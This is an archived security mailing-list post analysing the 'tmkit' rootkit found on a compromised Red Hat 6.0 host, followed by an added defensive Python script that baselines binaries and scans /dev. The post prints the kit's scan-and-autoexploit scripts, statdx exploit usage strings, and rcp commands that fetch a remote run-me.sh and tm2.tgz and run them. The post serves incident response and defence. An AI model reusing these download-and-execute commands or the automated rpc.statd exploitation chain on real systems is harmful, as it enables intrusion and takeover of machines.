Security Incidents mailing list archives
^Madereet (or tmkit)
From: Kristinn Torfason <kritor () MOBILESTOP COM>
Date: Wed, 1 Nov 2000 18:32:54 -0000
This concerns what seems to go by the name ^Madereet (or maybe more properly 'tmkit'). Around October 23rd my site, which was running an old RH 6.0 installation, got hacked. I don't know which hole the hacker used to break in, but here is some information on what he left behind, and how I noticed my systems had been compromised.

I noticed when issuing a ps command that it did not produce results in the format I expected. A quick search for ps produced a copy in /dev/^Madereet/.backup, at which point I disconnected the network cable after issuing who, last, a history command and looking at some of my logs. Only the logs provided some clues to what seemed to have been a portscan.

After examining the bogus ps binary I decided to try running the one in the /dev/^Madereet/.backup directory. That one seemed to be the original one, for it produced the format I am used to seeing and also showed me a process 'synscan' running, which I regretfully killed immediately. I should have attempted to examine if this thingy had any connections going.

The /dev/^Madereet directory contained a '.backup' directory and an 'other' directory. The '.backup' directory contained the files inetd, inetd.conf, netstat, and ps, which seemed to be backups of the original (normal) ones. The 'other' directory contained the following files:

    28.done:  ASCII text
    autohax:  ELF 32-bit LSB executable
    start.pl: perl commands text
    statd:    ELF 32-bit LSB executable
    synscan:  ELF 32-bit LSB executable
    do.sh:    Bourne shell script text

The '28.done' file contained one line-feed character.

The 'start.pl' file contained the following:

    #!/usr/bin/perl
    $random = int( rand(230)) + 4;
    system("./synscan '$random' '$random.statd' eth0 100 111");
    system("./do.sh '$random'");

The 'do.sh' file contained the following:

    #!/bin/sh
    cat $1.statd | grep statd > $1.new
    rm $1.statd
    cat $1.new | cut -f1 -d'(' >$1.done
    rm $1.new
    nohup ./autohax $1.done &

A closer examination of the contents of the files left in the /dev/^Madereet/other directory led to some further information. An examination of the 'statd' binary there, simply using vi, disclosed the following text:

    statdx by ron1n shellcode@hotmail.com
    Usage: %s [-t] [-p port] [-a addr] [-l len] [-o offset] [-w num] [-s secs] [-d type] <target>
    -t attack a tcp dispatcher [udp]
    -p rpc.statd serves requests on <port> [query]
    -a the stack address of the buffer is <addr>
    -l the length of the buffer is <len> [1024]
    -o the offset to return to is <offset> [600]
    -w the number of dwords to wipe is <num> [9]
    -s set timeout in seconds to <secs> [5]
    -d use a hardcoded <type>
    Available types:
    %d %s

This was followed by something quite interesting (I've replaced the actual IP with x's and the user name with fubar):

    rcp fubar@xxx.xxx.xx.xx:/dev/ptyp/run-me.sh ./;chmod +x run-me.sh;nohup ./run-me.sh &

.. and then by the following text:

    OMG! You now have rpc.statd technique!

The hardcoded rcp command immediately caught my attention, so I hooked up the network cable again and gave it a spin:

    rcp fubar@xxx.xxx.xx.xx:/dev/ptyp/run-me.sh ./

.. which indeed got me a file called 'run-me.sh' which contained:

    #!/bin/sh
    rcp fubar@xxx.xxx.xx.xx:/dev/ptyp/tm2.tgz ./;tar xzvf tm2.tgz;cd tm2
    ./setup

.. so I continued and did:

    rcp fubar@xxx.xxx.xx.xx:/dev/ptyp/tm2.tgz ./

.. which got me the file 'tm2.tgz'. This turns out to contain a base package similar to the one the hacker installed on my machine.

The machine hosting the 'fubar' account is a Solaris machine in Canada, and I think that machine has been hacked, and now seems to serve as some kind of platform for the hacker(s). The 'fubar' account on that machine seems to be wide open for rcp at least (planted .rhosts file?).

At this point, I have upgraded my gateway machine and shut all ports except 22 and 80, and continue examining the 'tm2.tgz' package more closely. A first preliminary examination of the package shows that it creates/modifies/exchanges the following files:

    /etc/inetd.conf
    /usr/sbin/time
    /bin/lpr
    /bin/ps
    /bin/netstat
    /usr/sbin/inetd
    /bin/ls
    /var/log/secure
    /var/log/messages
    /sbin/rpc.statd
    /dev/hdbp
    /dev/hdaq
    /dev/^Madereet
    /dev/^Madereet/.backup
    /dev/^Madereet/other
    /var/named/ADMROCKS

I would appreciate any comments, suggestions or feedback.

Best regards,
Kristinn Torfason
quirc@quirc.com
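The post above was detected only because a trojaned `ps` printed in an unfamiliar format. The following is an added example, not part of Kristinn's message or of tmkit, showing the two checks a defender would want against exactly this kit: a hash baseline over the binaries the post lists tmkit replacing (`/bin/ps`, `/bin/netstat`, `/usr/sbin/inetd`, ...), and a scan of `/dev` for things that do not belong there, since a real `/dev` holds device nodes, symlinks and fifos rather than ordinary files, and the kit's `^Madereet` name is how `ls` and vi render a directory name containing a literal carriage return. The fixture built by `demo()` is constructed for illustration; the directory name `"\radereet"`, the fake `ps` contents and the temporary root are all assumptions.

```python
"""Added example (not from the original post): integrity check over the files tmkit
is reported to touch, plus a /dev scan for non-device entries and odd names."""
import hashlib
import os
import stat
import tempfile
from pathlib import Path

# Paths the post reports tmkit creating, modifying or replacing.
TMKIT_PATHS = [
    "/etc/inetd.conf", "/usr/sbin/time", "/bin/lpr", "/bin/ps", "/bin/netstat",
    "/usr/sbin/inetd", "/bin/ls", "/var/log/secure", "/var/log/messages",
    "/sbin/rpc.statd", "/dev/hdbp", "/dev/hdaq", "/var/named/ADMROCKS",
]

# ASCII control characters; a carriage return (0x0D) in a name shows up as ^M in ls.
CONTROL_CHARS = {chr(c) for c in range(0x20)} | {chr(0x7F)}


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root, rel_paths):
    """Hash each existing regular file under root. Run this from a known-clean state
    (right after install, or against clean media), never from a box already suspected."""
    baseline = {}
    for rel in rel_paths:
        p = Path(root) / rel.lstrip("/")
        if p.is_file() and not p.is_symlink():
            baseline[rel] = sha256_file(p)
    return baseline


def verify_baseline(root, baseline):
    """Compare the live tree with the baseline; returns {path: reason} for every difference."""
    findings = {}
    for rel, expected in baseline.items():
        p = Path(root) / rel.lstrip("/")
        if not p.exists() and not p.is_symlink():
            findings[rel] = "missing"
        elif p.is_symlink() or not p.is_file():
            findings[rel] = "no longer a regular file"
        elif sha256_file(p) != expected:
            findings[rel] = "hash mismatch"
    return findings


def suspicious_dev_entries(dev_root):
    """Walk a /dev tree and flag regular files (device nodes, symlinks and fifos are
    normal; ordinary files are not) and directories or files whose names are hidden
    or contain control characters."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(dev_root):
        for name in dirnames:
            if name.startswith(".") or any(ch in CONTROL_CHARS for ch in name):
                hits.append((os.path.join(dirpath, name), "odd directory name"))
        for name in filenames:
            full = os.path.join(dirpath, name)
            if stat.S_ISREG(os.lstat(full).st_mode):
                hits.append((full, "regular file in /dev"))
            elif name.startswith(".") or any(ch in CONTROL_CHARS for ch in name):
                hits.append((full, "odd file name"))
    return sorted(hits)


def demo():
    """Constructed fixture: a throwaway root laid out the way the post describes the kit
    (original ps parked under /dev/<CR>adereet/.backup, trojan installed in /bin/ps)."""
    with tempfile.TemporaryDirectory() as root:
        r = Path(root)
        (r / "bin").mkdir()
        (r / "bin" / "ps").write_bytes(b"original ps\n")
        # baseline taken while the box is clean; netstat is absent so it is simply not recorded
        baseline = build_baseline(root, ["/bin/ps", "/bin/netstat"])
        kit = r / "dev" / "\radereet"          # assumed: "^M" in the post is a literal CR
        (kit / ".backup").mkdir(parents=True)
        (kit / "other").mkdir()
        (kit / ".backup" / "ps").write_bytes(b"original ps\n")
        (kit / "other" / "do.sh").write_bytes(b"#!/bin/sh\n")
        (r / "bin" / "ps").write_bytes(b"trojaned ps\n")
        changed = verify_baseline(root, baseline)
        dev_hits = [(os.path.relpath(p, root), why)
                    for p, why in suspicious_dev_entries(r / "dev")]
        return changed, dev_hits


if __name__ == "__main__":
    changed, dev_hits = demo()
    for rel, why in changed.items():
        print(f"{rel}: {why}")
    for rel, why in dev_hits:
        print(f"{rel.replace(chr(13), '^M')}: {why}")
```

On the RH 6.0 system described, `rpm -Va` gives a first pass at the same integrity check from the package database, with the caveat that a kit replacing `ps`, `ls` and `netstat` can just as easily replace `rpm`, so the hashes and the tools used to compute them should come from clean media, not from the suspect host. The `/dev` scan is deliberately narrow (regular files, hidden names, control characters) so it stays quiet on a normal `/dev` while catching the `.backup` and `other` directories the post found.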
Current thread:
- ^Madereet (or tmkit) Kristinn Torfason (Nov 05)
- Re: ^Madereet (or tmkit) Opus (Nov 06)